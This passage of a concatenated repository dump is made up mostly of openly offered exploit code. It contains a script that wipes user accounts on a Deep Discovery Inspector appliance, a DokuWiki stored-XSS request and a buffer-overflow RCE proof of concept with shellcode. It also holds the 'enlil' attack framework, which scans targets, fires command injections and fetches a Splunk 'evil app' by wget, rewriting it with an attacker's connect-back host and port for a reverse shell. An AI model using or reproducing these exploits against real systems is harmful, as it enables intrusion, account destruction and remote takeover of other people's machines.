%s") % (repID, repName)
181 |
182 | runme = subprocess.call([getRep],shell=True)
183 |
184 | print '[+] Report should be done in : ' + GREEN + str(repName) + ENDC
185 | # todo: check via sth like ls-la if rep.pdf is there
186 |
187 | print '[+] Thanks. Cheers!\n'
188 | #print ' Have fun ;)\n'
189 |
190 | except NameError, e:
191 | print RED + '[-] TargetID already exists, try different target host/IP' + ENDC
192 | print e
193 | pass
194 |
--------------------------------------------------------------------------------
/dcisoft-1.21-exp-0xdeff4c9d.0xda8adb89.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/dcisoft-1.21-exp-0xdeff4c9d.0xda8adb89.zip
--------------------------------------------------------------------------------
/deedi_py.txt:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # (postauth) drop all accounts on remote DDI box
3 | # based on Deep Discovery Inspector (3.7.1096)
4 | #
5 |
6 | # to use this code:
7 | # - log in to your DDI (as admin and go to users tab)
8 | # - run deedi.py
9 | # - refresh your users-page.
10 | # done.
11 | #
12 | import requests
13 |
14 | s = requests.Session()
15 | init_login = {
16 | 'usrname':'admin',
17 | 'passwd':'P@ssw0rd',
18 | 'isCookieEnable':1,
19 | 'action':'on',
20 | 'wrong_passwd':'%3C%21--invalid_passwd_flag--%3E'
21 | }
22 | req = s.post('https://192.168.2.18/cgi-bin/logon.cgi', data=init_login, verify=False)
23 | resp1 = req.text
24 | if '../cgi-bin/frame.cgi' in resp1:
25 | print 'logged in. next step...'
26 |
27 | newreq = 'https://192.168.2.18/php/user_add.php'
28 | bomb = "efbbbf626c61".decode("hex")
29 | user = 'tester3'
30 | crashddi = {
31 | 'do_action':'add',
32 | 'id':user+bomb
33 | }
34 |
35 | print bomb
36 |
37 | req2 = s.post(newreq, data=crashddi, verify=False)
38 | #print req2.text
39 | print 'done'
40 |
41 | ## code610@11.01.2018
42 | ##
43 | # o/
44 |
45 |
--------------------------------------------------------------------------------
/dokuwiki-2018-04-22b-xss.txt:
--------------------------------------------------------------------------------
1 | POST /doku.php HTTP/1.1
2 | Host: 192.168.1.49
3 | Content-Length: 7726
4 | Cache-Control: max-age=0
5 | Origin: http://192.168.1.49
6 | Upgrade-Insecure-Requests: 1
7 | Content-Type: application/x-www-form-urlencoded
8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
9 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
10 | Referer: http://192.168.1.49/doku.php?id=start&do=admin&page=config
11 | Accept-Encoding: gzip, deflate
12 | Accept-Language: en-US,en;q=0.9
13 | Cookie: DokuWiki=8h3a23e7c2lnhj6q3g69bcb17l; DW68700bfd16c2027de7de74a5a8202a6f=dXNlcg%3D%3D%7C0%7C0pDGaOqk89XqSSg6qfAn1i6oHNRYzJbctgXDGkKcqv0%3D; DOKU_PREFS=list%23thumbs%23ext_enabled%231%23ext_disabled%231%23ext_updatable%231
14 | Connection: close
15 |
16 | id=start§ok=7d0965a15bb314aefc1866dfb6870d3e&config%5Btitle%5D=user's%20DokuWiki!%7d%7dsc94n%3cscript%3econfirm(1)%3c%2fscript%3epnhi4&config%5Bstart%5D=start&config%5Blang%5D=en&config%5Btagline%5D=&config%5Bsidebar%5D=sidebar&config%5Blicense%5D=cc-by-nc-sa&config%5Bsavedir%5D=%2Fopt%2Fbitnami%2Fapps%2Fdokuwiki%2Fhtdocs%2Fdata&config%5Bbasedir%5D=&config%5Bbaseurl%5D=&config%5Bcookiedir%5D=&config%5Bdmode%5D=0755&config%5Bfmode%5D=0644&config%5Brecent%5D=20&config%5Brecent_days%5D=7&config%5Bbreadcrumbs%5D=10&config%5Btypography%5D=1&config%5Bdformat%5D=%25Y%2F%25m%2F%25d+%25H%3A%25M&config%5Bsignature%5D=+---+%2F%2F%5B%5B%40MAIL%40%7C%40NAME%40%5D%5D+%40DATE%40%2F%2F&config%5Bshowuseras%5D=loginname&config%5Btoptoclevel%5D=1&config%5Btocminheads%5D=3&config%5Bmaxtoclevel%5D=3&config%5Bmaxseclevel%5D=3&config%5Bdeaccent%5D=1&config%5Buseheading%5D=0&config%5Bhidepages%5D=&config%5Buseacl%5D=1&config%5Bautopasswd%5D=1&config%5Bauthtype%5D=authplain&config%5Bpasscrypt%5D=smd5&config%5Bdefaultgroup%5D=user&config%5Bsuperuser%5D=%40admin&config%5Bmanager%5D=%21%21not+set%21%21&config%5Bprofileconfirm%5D=1&config%5Brememberme%5D=1&config%5Bdisableactions%5D%5Bother%5D=&config%5Bauth_security_timeout%5D=900&config%5Bsecurecookie%5D=1&config%5Bremoteuser%5D=%21%21not+set%21%21&config%5Busewordblock%5D=1&config%5Brelnofollow%5D=1&config%5Bindexdelay%5D=60*60*24*5&config%5Bmailguard%5D=hex&config%5Biexssprotect%5D=1&config%5Busedraft%5D=1&config%5Blocktime%5D=15*60&config%5Bcachetime%5D=60*60*24&config%5Btarget____wiki%5D=&config%5Btarget____interwiki%5D=&config%5Btarget____extern%5D=&config%5Btarget____media%5D=&config%5Btarget____windows%5D=&config%5Bmediarevisions%5D=1&config%5Bgdlib%5D=2&config%5Bim_convert%5D=&config%5Bjpg_quality%5D=70&config%5Bfetchsize%5D=0&config%5Brefcheck%5D=1&config%5Bsubscribe_time%5D=24*60*60&config%5Bnotify%5D=&config%5Bregisternotify%5D=&config%5Bmailfrom%5D=&config%5Bmailreturnpath%5D=&config%5Bmailprefix%5D=&config%5Bhtmlmail%5D=1&config%5Bsitemap%5D=0&config%5Brss_type%5D=rss1&config%5Brss_linkto%5D=diff&config%5Brss_content%5D=abstract&config%5Brss_media%5D=both&config%5Brss_update%5D=5*60&config%5Brss_show_summary%5D=1&config%5Bupdatecheck%5D=1&config%5Buserewrite%5D=0&config%5Bsepchar%5D=_&config%5Bfnencode%5D=url&config%5Bcompress%5D=1&config%5Bcssdatauri%5D=512&config%5Bcompression%5D=gz&config%5Bxsendfile%5D=0&config%5Breaddircache%5D=0&config%5Bsearch_nslimit%5D=0&config%5Bsearch_fragment%5D=exact&config%5Bdnslookups%5D=1&config%5Bjquerycdn%5D=0&config%5Bproxy____host%5D=&config%5Bproxy____port%5D=&config%5Bproxy____user%5D=&config%5Bproxy____pass%5D=&config%5Bproxy____except%5D=&config%5Bftp____host%5D=localhost&config%5Bftp____port%5D=21&config%5Bftp____user%5D=user&config%5Bftp____pass%5D=&config%5Bftp____root%5D=%2Fhome%2Fuser%2Fhtdocs&config%5Bplugin____authmysql____server%5D=&config%5Bplugin____authmysql____user%5D=&config%5Bplugin____authmysql____password%5D=&config%5Bplugin____authmysql____database%5D=&config%5Bplugin____authmysql____charset%5D=utf8&config%5Bplugin____authmysql____debug%5D=0&config%5Bplugin____authmysql____TablesToLock%5D=&config%5Bplugin____authmysql____checkPass%5D=&config%5Bplugin____authmysql____getUserInfo%5D=&config%5Bplugin____authmysql____getGroups%5D=&config%5Bplugin____authmysql____getUsers%5D=&config%5Bplugin____authmysql____FilterLogin%5D=&config%5Bplugin____authmysql____FilterName%5D=&config%5Bplugin____authmysql____FilterEmail%5D=&config%5Bplugin____authmysql____FilterGroup%5D=&config%5Bplugin____authmysql____SortOrder%5D=&config%5Bplugin____authmysql____addUser%5D=&config%5Bplugin____authmysql____addGroup%5D=&config%5Bplugin____authmysql____addUserGroup%5D=&config%5Bplugin____authmysql____delGroup%5D=&config%5Bplugin____authmysql____getUserID%5D=&config%5Bplugin____authmysql____delUser%5D=&config%5Bplugin____authmysql____delUserRefs%5D=&config%5Bplugin____authmysql____updateUser%5D=&config%5Bplugin____authmysql____UpdateLogin%5D=&config%5Bplugin____authmysql____UpdatePass%5D=&config%5Bplugin____authmysql____UpdateEmail%5D=&config%5Bplugin____authmysql____UpdateName%5D=&config%5Bplugin____authmysql____UpdateTarget%5D=&config%5Bplugin____authmysql____delUserGroup%5D=&config%5Bplugin____authmysql____getGroupID%5D=&config%5Bplugin____smtp____smtp_host%5D=localhost&config%5Bplugin____smtp____smtp_port%5D=25&config%5Bplugin____smtp____smtp_ssl%5D=&config%5Bplugin____smtp____auth_user%5D=&config%5Bplugin____smtp____auth_pass%5D=&config%5Bplugin____smtp____localdomain%5D=&config%5Bplugin____authldap____server%5D=&config%5Bplugin____authldap____port%5D=389&config%5Bplugin____authldap____usertree%5D=&config%5Bplugin____authldap____grouptree%5D=&config%5Bplugin____authldap____userfilter%5D=&config%5Bplugin____authldap____groupfilter%5D=&config%5Bplugin____authldap____version%5D=2&config%5Bplugin____authldap____referrals%5D=-1&config%5Bplugin____authldap____deref%5D=0&config%5Bplugin____authldap____binddn%5D=&config%5Bplugin____authldap____bindpw%5D=&config%5Bplugin____authldap____userscope%5D=sub&config%5Bplugin____authldap____groupscope%5D=sub&config%5Bplugin____authldap____userkey%5D=uid&config%5Bplugin____authldap____groupkey%5D=cn&config%5Bplugin____authldap____modPass%5D=1&config%5Bplugin____authpgsql____server%5D=&config%5Bplugin____authpgsql____port%5D=5432&config%5Bplugin____authpgsql____user%5D=&config%5Bplugin____authpgsql____password%5D=&config%5Bplugin____authpgsql____database%5D=&config%5Bplugin____authpgsql____checkPass%5D=&config%5Bplugin____authpgsql____getUserInfo%5D=&config%5Bplugin____authpgsql____getGroups%5D=&config%5Bplugin____authpgsql____getUsers%5D=&config%5Bplugin____authpgsql____FilterLogin%5D=&config%5Bplugin____authpgsql____FilterName%5D=&config%5Bplugin____authpgsql____FilterEmail%5D=&config%5Bplugin____authpgsql____FilterGroup%5D=&config%5Bplugin____authpgsql____SortOrder%5D=&config%5Bplugin____authpgsql____addUser%5D=&config%5Bplugin____authpgsql____addGroup%5D=&config%5Bplugin____authpgsql____addUserGroup%5D=&config%5Bplugin____authpgsql____delGroup%5D=&config%5Bplugin____authpgsql____getUserID%5D=&config%5Bplugin____authpgsql____delUser%5D=&config%5Bplugin____authpgsql____delUserRefs%5D=&config%5Bplugin____authpgsql____updateUser%5D=&config%5Bplugin____authpgsql____UpdateLogin%5D=&config%5Bplugin____authpgsql____UpdatePass%5D=&config%5Bplugin____authpgsql____UpdateEmail%5D=&config%5Bplugin____authpgsql____UpdateName%5D=&config%5Bplugin____authpgsql____UpdateTarget%5D=&config%5Bplugin____authpgsql____delUserGroup%5D=&config%5Bplugin____authpgsql____getGroupID%5D=&config%5Bplugin____authpdo____dsn%5D=&config%5Bplugin____authpdo____user%5D=&config%5Bplugin____authpdo____pass%5D=&config%5Bplugin____authpdo____select-user%5D=&config%5Bplugin____authpdo____check-pass%5D=&config%5Bplugin____authpdo____select-user-groups%5D=&config%5Bplugin____authpdo____select-groups%5D=&config%5Bplugin____authpdo____insert-user%5D=&config%5Bplugin____authpdo____delete-user%5D=&config%5Bplugin____authpdo____list-users%5D=&config%5Bplugin____authpdo____count-users%5D=&config%5Bplugin____authpdo____update-user-info%5D=&config%5Bplugin____authpdo____update-user-login%5D=&config%5Bplugin____authpdo____update-user-pass%5D=&config%5Bplugin____authpdo____insert-group%5D=&config%5Bplugin____authpdo____join-group%5D=&config%5Bplugin____authpdo____leave-group%5D=&config%5Bplugin____authad____account_suffix%5D=&config%5Bplugin____authad____base_dn%5D=&config%5Bplugin____authad____domain_controllers%5D=&config%5Bplugin____authad____sso_charset%5D=&config%5Bplugin____authad____admin_username%5D=&config%5Bplugin____authad____admin_password%5D=&config%5Bplugin____authad____expirywarn%5D=0&config%5Bplugin____authad____additional%5D=&do=admin&page=config&save=1&submit=
--------------------------------------------------------------------------------
/edrawmax-sploitable-pack.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/edrawmax-sploitable-pack.zip
--------------------------------------------------------------------------------
/effs-rce-poc.py:
--------------------------------------------------------------------------------
1 | c@kali:~/easyhackttp$ cat r8.py
2 | #!/usr/bin/env python
3 |
4 | import socket
5 | import sys
6 |
7 | target = str(sys.argv[1])
8 | port = 80
9 |
10 | req = socket.socket()
11 | print "Connecting to: %s:%s" % ( target, port )
12 | req.connect((host,port))
13 |
14 |
15 | shellcode = (
16 | "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
17 | "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
18 | "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
19 | "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
20 | "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
21 | "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
22 | "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
23 | "\x1c\x39\xbd"
24 | )
25 |
26 | print len(shellcode)
27 |
28 | buffbuff = 'A'*4061
29 | buffbuff += '\xeb\x07\x90\x90' # NSEH
30 | buffbuff += '\xd4\xb1\x01\x10' # SEH
31 | buffbuff += '\x90'*19
32 | buffbuff += shellcode
33 | buffbuff += 'D'*312 # padding
34 |
35 | # GETme
36 | req.send("GET " + buffbuff + " HTTP/1.0\r\n\r\n")
37 |
38 | req.close()
39 |
40 | print "Done..."
41 | c@kali:~/easyhackttp$
42 |
--------------------------------------------------------------------------------
/enlil:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/enlil-v0.2/enlil.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # enlil - v0.2
3 | #
4 | # 26.05.2019 @ 00:28
5 | # full tutorial: https://www.youtube.com/watch?v=cQWu4B6mV2Q
6 | # have fun ;]
7 | #
8 |
9 | # --- imports ---
10 | import sys
11 |
12 | # --- defines ---
13 | from pymongo import MongoClient
14 |
15 | sys.path.append('./files')
16 | import core
17 |
18 |
19 | ## --- functions ---
20 | def main():
21 | core.banner()
22 | core.menu()
23 |
24 | print '\nThanks, bye! o/\n'
25 |
26 |
27 | ## --- main ---
28 | if __name__ == '__main__':
29 | main()
30 |
31 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/core.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # This Python file uses the following encoding: utf-8
3 | # core.py - main function(s) for our starter...
4 | #
5 | # - 26.05.2019 @ 10:56
6 | #
7 | # detailed tutorial:
8 | # https://www.youtube.com/watch?v=S1j4K_D3ZQo
9 | #
10 |
11 | # --- imports ---
12 | import sys
13 | sys.path.append('files')
14 | import datetime
15 | import os
16 | import subprocess
17 | #from pymongo import MongoClient
18 | from stomp import * # for STOMP protocol
19 | import stomp
20 |
21 |
22 | # --- paths/implants ---
23 | import path01 # openssh enum bug
24 | import path02 # kibana getversion
25 | import path03 # testing elasticsearch
26 | import path04 # testing oracle tns listener
27 | import path05 # testing splunk
28 | import path06 # testing influxdb
29 | import path07 # testing mongodb
30 | import path08 # testing pcp
31 | import path09 # testing mysql
32 | import path10 # testing prometheus # (still todo)
33 | import path11 # testing active mq web console (8191) / stomp
34 | import path12 # testing vamax 8.x rce
35 | import path13 # testing activemq - admin panel
36 | import path14 # testing JDWP protocol
37 |
38 | import implants
39 | # ...wanna more?
40 |
41 | # --- defines ---
42 | now = datetime.datetime.now()
43 | current_date = now.strftime("%d.%m.%Y %H:%M")
44 |
45 | # --- super colours ---
46 | HEADER = '\033[95m'
47 | OKBLUE = '\033[94m'
48 | OKGREEN = '\033[92m'
49 | WARNING = '\033[93m'
50 | FAIL = '\033[91m'
51 | ENDC = '\033[0m'
52 | BOLD = '\033[1m'
53 | UNDERLINE = '\033[4m'
54 |
55 |
56 |
57 | ## --- functions ---
58 | def banner():
59 | # *****************************************************************
60 | print WARNING + '\n'
61 | print ' ███████╗███╗ ██╗██╗ ██╗██╗ (' + str(current_date) + ')'
62 | print ' ██╔════╝████╗ ██║██║ ██║██║ '
63 | print ' █████╗ ██╔██╗ ██║██║ ██║██║ '
64 | print ' ██╔══╝ ██║╚██╗██║██║ ██║██║ '
65 | print ' ███████╗██║ ╚████║███████╗██║███████╗ '
66 | print ' ╚══════╝╚═╝ ╚═══╝╚══════╝╚═╝╚══════╝ '
67 | print ENDC
68 |
69 |
70 | #print '*'*65
71 | #print ' *** enlil - v0.1 *** (' + str(current_date) +')'
72 | #print '*'*65 + ENDC + '\n'
73 |
74 | ##
75 |
76 | def menu():
77 | print OKBLUE + ' Ask me for:' + ENDC
78 | print ' ' + UNDERLINE + '1] scan' + ENDC
79 | print ' ' + UNDERLINE + '2] readlog' + ENDC
80 | print ' ' + UNDERLINE + '3] path' + ENDC
81 | print ' ' + UNDERLINE + '4] implant' + ENDC
82 | print ''
83 | choice = raw_input(' > ')
84 | print ''
85 |
86 | if choice == '1': # 1] scan
87 | print OKGREEN + ' [+] your choice: ' + choice + ENDC
88 | print ' [+] preparing scan...'
89 | scan_target()
90 | menu()
91 |
92 | elif choice == '2': # 2] readlog
93 | print OKGREEN + ' [+] your choice: ' + choice + ENDC
94 | readlog_target()
95 | menu()
96 |
97 | elif choice == '3': # 3] path
98 | print OKGREEN + ' [+] your choice: ' + choice + ENDC
99 | path_target()
100 | menu()
101 |
102 | elif choice == '4': # 4] implant
103 | print OKGREEN + ' [+] your choice: ' + choice + ENDC
104 | implants.run()
105 | menu()
106 |
107 | elif choice == 'q':
108 | print FAIL + ' \n Well... bye :7\n' + ENDC
109 | sys.exit(0)
110 |
111 | else:
112 | print BOLD + ' [-] wrong, again Neo\n' + ENDC
113 | menu()
114 |
115 |
116 | ##
117 |
118 | def scan_target():
119 | # run scan now, when all env is ready to future log/s
120 | print OKBLUE
121 | target = raw_input(' target[IP]> ')
122 | print ENDC
123 |
124 | # check/prepare env (if needed)
125 | prepare_env(target)
126 |
127 | # run the scan when all settings/env are ready
128 | cmd = 'nmap -sV -vvv -n --top-ports 15000 -Pn --max-retries 1 --min-rate 120 -oN ' + './' + target + '/' + target + '.log ' + target
129 | # cmd = 'nmap -sV -v -n -p- -Pn --max-retries 1 --min-rate 121 -oN ' + './' + target + '/'+ target + '.log ' + target
130 | runme = subprocess.call([ cmd ], shell=True)
131 |
132 | print '\n'
133 | print OKGREEN + ' [i] Scan module finished.\n' + ENDC
134 |
135 | ##
136 |
137 | def prepare_env(target):
138 | print BOLD + ' [i] checking env for target: ' + target + ENDC
139 |
140 | pwd = os.getcwd()
141 | print OKGREEN + ' [+] pwd: ' + pwd + ENDC
142 |
143 | # checking for target logdir
144 | targetLogDir = pwd + '/' + target
145 | if os.path.exists(targetLogDir):
146 | print OKGREEN + ' [+] Target logdir exists, skip' + ENDC
147 | else:
148 | # create log dirs
149 | try:
150 | os.mkdir(targetLogDir)
151 | print OKGREEN + ' [+] Log directory created : ' + targetLogDir + ENDC
152 | except OSError, e:
153 | print OKGREEN + ' [+] Log directory is already there' + ENDC
154 |
155 | print '\n'
156 |
157 | ##
158 |
159 | def readlog_target():
160 | pwd = os.getcwd()
161 |
162 | # first of all: check for target's env
163 | print OKBLUE
164 | read_target = raw_input(' > Read target[IP]> ')
165 | print ENDC
166 |
167 | # checking for env for our target; must be scanned first of log
168 | # should be placed 'manually'
169 | prepare_env(read_target)
170 |
171 | print '\n'
172 | print '------------------------------------------------'
173 | print BOLD + ' [i] Found open port(s):' + ENDC
174 | print '------------------------------------------------'
175 | # find open ports now
176 | targetLogFile = pwd + '/' + read_target + '/' + read_target + '.log'
177 | fp = open(targetLogFile, 'r')
178 | lines = fp.readlines()
179 |
180 | for line in lines:
181 | if line.find('/tcp') != -1:
182 | if line.find('open') != -1:
183 | print ' [open port]: ' + line.rstrip()
184 |
185 |
186 | print '\n'
187 |
188 | ##
189 |
190 | def path_target():
191 | pwd = os.getcwd()
192 |
193 | print OKBLUE
194 | # readl log for specific target and prepare some useful path(s)
195 | target = raw_input(' target[IP]> ')
196 | print ENDC
197 |
198 | # prepare_env(target) # if needed
199 | print '\n'
200 | print BOLD + ' [i] Found possible path(s):' + ENDC
201 | targetLogFile = pwd + '/' + target + '/' + target + '.log'
202 |
203 |
204 | fp = open(targetLogFile, 'r')
205 | lines = fp.readlines()
206 |
207 | path_num = 0
208 | print HEADER
209 | for line in lines:
210 | if line.find('OpenSSH') != -1:
211 | substring = "OpenSSH"
212 | string = line # ex. "Banner 22/tcp OpenSSH 7.7p321"
213 | substring_list = ['OpenSSH 5.','OpenSSH 6.','OpenSSH 7.7','OpenSSH 7.']
214 | vulnerable = any(substring in string for substring in substring_list)
215 | #print vulnerable
216 |
217 | if vulnerable == True:
218 | print ' [path 01]> possibly openssh user enum bug'
219 | # run pocssh now
220 |
221 | elif line.find('5601/tcp') != -1:
222 | print ' [path 02]> kibana webapp'
223 |
224 | elif line.find('9200/tcp') != -1:
225 | print ' [path 03a]> ElasticSearch at 9200 - check version'
226 |
227 | elif line.find('9200/tcp') != -1:
228 | print ' [path 03b]> ElasticSearch at 9200 - preauth search'
229 |
230 | elif line.find('Oracle TNS listener') != -1:
231 | if line.find('unauthorized') != -1:
232 | print ' [path 04] Oracle TNS listener found'
233 |
234 | elif line.find('8000/tcp') != -1:
235 | if line.find('CherryPy httpd') != -1:
236 | print ' [path 05a] Splunk get version (default: 8000/tcp)'
237 |
238 | elif line.find('8089/tcp') != -1:
239 | print ' [path 05b] Splunk REST API check (default: 8089/tcp)'
240 |
241 | elif line.find('InfluxDB') != -1:
242 | print ' [path 06] InfluxDB - preauth get DB\'s'
243 |
244 | elif line.find('8086/tcp') != -1:
245 | print ' [path 06] InfluxDB - preauth get DB\'s'
246 |
247 | elif line.find('MongoDB') != -1:
248 | print ' [path 07a] MongoDB found' # run# apt-get install python-pymongo
249 | print ' [path 07b] MongoDB - postauth list '
250 |
251 | elif line.find('44321/tcp') != -1:
252 | print ' [path 08] PCP found online' # run# apt-get install pcp-manager
253 |
254 | elif line.find('MySQL') != -1:
255 | if line.find('unauthorized') != -1:
256 | print ' [path 09] MySQL found unauthorized'
257 |
258 | elif line.find('Go-IPFS json-rpc or InfluxDB API') != -1:
259 | if line.find('9090/tcp') != -1: # default for Prometheus
260 | print ' [path 10] Go-IPFS json-rpc/InfluxDB API/Prometheus - found'
261 |
262 | elif line.find('8161/tcp') != -1:
263 | print ' [path 11] Active MQ - Web Console found'
264 |
265 | elif line.find('9080/tcp') != -1:
266 | print ' [path 12] VA MAX (8.3.x) - possible RCE'
267 |
268 | elif line.find('61616') != -1: # 61613-6/tcp
269 | print ' [path 13] ActiveMQ STOMP found'
270 |
271 | elif line.find('5005') != -1: # default jdwp
272 | print ' [path 14] JDWP service found open'
273 | elif line.find('JWDP') != -1: # TODO: ;]
274 | print ' [path 14] JDWP service found open'
275 |
276 |
277 | # next...
278 |
279 | print ENDC # of HEADER for path(s)
280 | print OKGREEN + ' [+] searching for path(s) - finished.\n' + ENDC
281 |
282 | print BOLD
283 | try_path = raw_input(' [?] Path to try> ')
284 | print ENDC
285 |
286 | if try_path == '1' : path01.enum() # path01: ssh enum bug
287 | elif try_path == '2' : path02.getversion() # path02: kibana webapp
288 | elif try_path == '3a' : path03.getversion() # path03a: elasticsearch on 9200
289 | elif try_path == '3b' : path03.preauth_search() # path03b: elasticsearch preauth search
290 | elif try_path == '4' : path04.tnscmds() # path04: preauth tns listener, ver, stat
291 | elif try_path == '5a' : path05.getversion() # path05a: testing splunk at 8000/tcp
292 | elif try_path == '5b' : path05.getrest() # path05b: testing splunk at 8089/tcp
293 | elif try_path == '6' : path06.getDBs() # path06: influxdb - get databases
294 | elif try_path == '7a' : path07.preauthlist() # path07: preauth list available DB's
295 | elif try_path == '7b' : path07.postauthlist() # path07: postauth list available DB's
296 | elif try_path == '8' : path08.getstats() # path08: pcp stats online
297 | elif try_path == '9' : path09.getdbs() # path09: testing mysql
298 | # elif try_path == '10' : path10.getinfo() # path10: prometheus - getinfo
299 | elif try_path == '11' : path11.getadminlogin() # path11: active mq web console small bf test
300 | elif try_path == '12' : path12.getrce() # path12: vamax 8.3.x rce
301 | elif try_path == '13a': path13.bf() # admin panel bf activemq
302 | elif try_path == '13b': path13.sender() # stomp sender activemq
303 | elif try_path == '14' : path14.gotleak() # path14: testing jdwp
304 |
305 | # ...
306 | else:
307 | print FAIL + ' Don\'t play with me.\n' + ENDC
308 |
309 |
310 | print '\n'
311 | menu() # # goto 'main' starter: menu()
312 |
313 | ##
314 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/implants.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # implants.py - core file for implants
3 | #
4 | # current:
5 | # - local:
6 | # - splunk app
7 | # - remote:
8 | # - ...
9 | #
10 | #
11 |
12 | # --- imports ---
13 | import subprocess
14 | import re
15 | import sys
16 | import requests
17 | import random
18 | import string
19 | import socket
20 |
21 | # from files if needed
22 | sys.path.append('files')
23 | import core
24 |
25 | # --- super colours ---
26 | HEADER = '\033[95m'
27 | OKBLUE = '\033[94m'
28 | OKGREEN = '\033[92m'
29 | WARNING = '\033[93m'
30 | FAIL = '\033[91m'
31 | ENDC = '\033[0m'
32 | BOLD = '\033[1m'
33 | UNDERLINE = '\033[4m'
34 |
35 |
36 |
37 | def run(): # main for preparing implants
38 |
39 | print OKBLUE
40 | #target = raw_input(' target[IP]> ')
41 | #print ENDC
42 |
43 | make_implant = raw_input(' Type (local, remote)> ')
44 | print ENDC
45 |
46 | if make_implant == 'remote':
47 | print OKGREEN
48 | print ' [+] implant: remote'
49 | print ENDC
50 | implant_remote()
51 |
52 | elif make_implant == 'local':
53 | print OKGREEN
54 | print ' [+] implant: local'
55 | print ENDC
56 | implant_local()
57 |
58 | else:
59 | print FAIL + ' [-] no such implant group, sorry.\n' + ENDC
60 | core.menu() # starter() # goto main if you don't know what you're doing
61 |
62 | ##
63 |
64 | def implant_remote():
65 |
66 | # todo: one or more sample requests to try... ;S
67 | # below it's only basic one (as usual, sorry)
68 | print '\n' + BOLD
69 | print ' [implant:remote]'
70 | target = raw_input(' [retype target/ip]: ')
71 | shttp = raw_input(' [http/https]: ')
72 | port = raw_input(' [port]: ')
73 | urlpath = raw_input(' [rcepath]: ')
74 | param = raw_input(' [param]: ')
75 | #method = raw_input(' [method]: ')
76 | print ' [method]: GET' # todo ;)
77 | cmd = 'id'
78 | print ENDC
79 |
80 | preparing = shttp + '://'+target+':'+port+'/'+urlpath+'?'+param+'=' + cmd
81 | req = requests.get(preparing)
82 | resp = req.text
83 |
84 | print ' -- resp --\n'
85 | print resp
86 | print ' -- end of resp --\n'
87 |
88 | ## finished, so goto starter()
89 | core.menu() # starter()
90 |
91 | ##
92 |
93 | def implant_local():
94 | print '\n' + BOLD + ' [implant:local]\n'
95 |
96 | # prepare local file to use it as revshell/backdoor/etc
97 | print
98 | print ' -- implants - local menu --'
99 | print ''
100 | print ' [a] PHP webshell - simple file (win/lin)' # to fix
101 | print ' [b] Splunk evil app (lin)'
102 | print ' [c] receive some answers from remote port'
103 | print ''
104 |
105 | # print ' [e] getRes'...
106 | print '' + ENDC
107 |
108 | choice = raw_input(' >> ')
109 | print ' ---- ---- ---- ---- ----'
110 | print OKGREEN + '\n [+] Ok, let\'s do this! :)\n' + ENDC
111 |
112 | if choice == 'a':
113 | print OKGREEN + ' [+] PHP webshell - simple file (win/lin)' + ENDC
114 | print ''
115 | # ... todo: ...implant_local_a()
116 |
117 | elif choice == 'b':
118 | print OKGREEN + ' [+] Splunk evil app (lin)' + ENDC
119 | print ''
120 | splunk_evil_app()
121 |
122 | elif choice == 'c':
123 | print OKGREEN + ' [+] receive some answers from remote port' + ENDC
124 | print ''
125 | receive_port()
126 |
127 | else:
128 | print FAIL + '[-] wrong. try again next year.\n' + ENDC
129 | core.menu() # starter() # goto 'main()'
130 |
131 |
132 | ## ---
133 | # our super implants:
134 | #
135 |
136 | def splunk_evil_app():
137 | print OKGREEN
138 | print ' [+] Creating Splunk evil app (for Linux)' + ENDC
139 | print '' + BOLD + '\n'
140 |
141 | print ' Press 1 to download or 2 to use local app (tgz):'
142 | get_or_have = raw_input(' [1/2]: ')
143 |
144 | if get_or_have == '1':
145 | print ' [+] downloading the app...'
146 | default_app = 'https://github.com/c610/tmp/raw/master/apka2.tgz'
147 | getapp = 'wget ' + default_app + ' -O /tmp/apka2.tgz'
148 | subprocess.call([ getapp ], shell=True)
149 | print OKGREEN
150 | print ' [+] app should be ready in /tmp/apka2.tgz'
151 | print ' [+] preparing...' + ENDC
152 |
153 | random1 = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)])
154 | appname = random1 # new appname cuz Splunk don't like the same :C
155 |
156 | lhost = raw_input(' connecback to[IP]> ')
157 | lport = raw_input(' connctback to[port] ')
158 |
159 |
160 | rewriteapp = "cd /tmp; tar zxvf /tmp/apka2.tgz;"
161 | rewriteapp += "cd /tmp/apka2/bin;sed -e 's/192.168.1.160/" + lhost + "/g' apka2.py > apkanew.py;"
162 | rewriteapp += "sed -e 's/4444/" + lport + "/g' apkanew.py > apkafinal.py;"
163 | rewriteapp += "cd /tmp/apka2/default/;sed -e 's/\[apka2/\[" + appname + "/g' commands.conf > commands.new;"
164 | rewriteapp += "rm /tmp/apka2/default/commands.conf; mv /tmp/apka2/default/commands.new /tmp/apka2/default/commands.conf;"
165 | rewriteapp += "rm /tmp/apka2/bin/apka2.py /tmp/apka2/bin/apkanew.py; cd /tmp; tar cf /tmp/apkash.tgz ./apka2/;"
166 | rewriteapp += "ls -la /tmp/apkash.tgz"
167 |
168 | subprocess.call([rewriteapp], shell=True)
